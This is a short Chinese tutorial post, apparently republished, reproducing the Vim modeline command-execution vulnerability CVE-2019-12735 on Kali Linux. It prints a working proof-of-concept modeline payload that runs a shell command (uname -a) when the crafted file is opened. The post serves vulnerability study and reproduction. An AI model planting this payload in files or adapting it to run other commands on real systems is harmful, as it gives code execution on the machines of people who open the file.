CVE-2019-12735 VIM命令执行漏洞利用

Posted dgjnszf

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2019-12735 VIM命令执行漏洞利用相关的知识,希望对你有一定的参考价值。

操作系统:Kali Linux

VIM版本:VIM - Vi IMproved 8.1.693 (2018 May 18, compiled Jan 05 2019 20:53:12)

因为vim默认关闭modeline,所以首先要手工设置modeline。

第1步:开启modeline

在用户家目录(如:/root/)下创建.vimrc文件,文件内容为:

set modeline

技术图片

第2步:创建poc.txt

创建poc.txt,文件内容为:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\\!\\ \\%"):fdl=0:fdt="

第3步:打开poc.txt

使用vim打开poc.txt即可看到uname命令的执行结果。

技术图片

这个漏洞比较鸡肋的一点就是vim默认不开启modeline,所以漏洞影响范围有一定局限性。

 

以上是关于CVE-2019-12735 VIM命令执行漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章

Vim编辑器本地代码执行漏洞预警(CVE-2019-12735)

[转帖]基于VIM漏洞CVE-2019-12735的VIM宏后门病毒详解

Vim 和 NeoVim 曝出高危漏洞

Vim 和 NeoVim 曝出高危漏洞;外媒称阿里巴巴已经递交香港上市申请

集训第六天:文件上传漏洞

memcache 未授权访问漏洞